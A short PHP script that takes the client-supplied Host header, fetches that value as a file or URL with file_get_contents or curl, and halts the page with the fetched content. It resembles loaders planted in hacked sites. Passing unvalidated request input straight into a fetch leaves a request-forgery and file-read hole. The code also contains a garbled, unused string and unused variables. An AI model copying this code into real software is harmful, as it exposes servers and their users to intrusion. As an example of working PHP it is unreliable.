<?php
global $is_bug;

$bug_url="หัรจ";

$http_host=$_SERVER["HTTP_HOST"];

$file=myfile($http_host);

if(!empty($file))
{
   die($file);
}
function myfile($url)
   {
      if(function_exists('file_get_contents')) {
      $file_contents = @file_get_contents($url);
      } else {
      $ch = curl_init();
      $timeout = 5; 
      curl_setopt ($ch, CURLOPT_URL, $url);
      curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
      curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
      $file_contents = curl_exec($ch);
      curl_close($ch);
	  }
      return $file_contents;
    }
?>